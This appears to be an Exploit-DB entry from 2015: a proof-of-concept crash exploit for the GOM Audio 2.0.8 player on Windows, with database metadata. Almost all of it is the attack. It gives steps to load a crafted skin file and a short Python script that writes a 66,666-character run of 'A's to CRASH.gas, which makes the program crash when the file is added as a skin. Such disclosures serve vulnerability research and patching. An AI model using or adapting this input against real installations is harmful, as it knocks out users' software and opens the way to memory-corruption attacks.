GOM Audio 2.0.8 - '.gas' Crash (PoC)
Author: Un_N0n
type: dos
platform: windows
port:
date_added: 2015-08-24
date_updated: 2015-08-24
verified: 0
codes: OSVDB-126630
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comGOMAUDIOGLOBALSETUP.EXE
********************************************************************************************
# Exploit Title: GOM Audio 2.0.8 Crash POC
# Date: 8/24/2015
# Exploit Author: Un_N0n
# Software Vendor : http://audio.gomlab.com/
# Software Link: http://audio.gomlab.com/download_log.gom
# Version: 2.0.8 (2015/06/17)
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'Goma.exe'.
2- Goto Preference -> Manage -> Skins.
3- Click on ADD, Browse CRASH.gas in it.
~ Software will Crash.
[Code to produce crash.txt]:
junk = "A"*66666
file = open("CRASH.gas",'w')
file.write(junk)
file.close()
**********************************************************************************************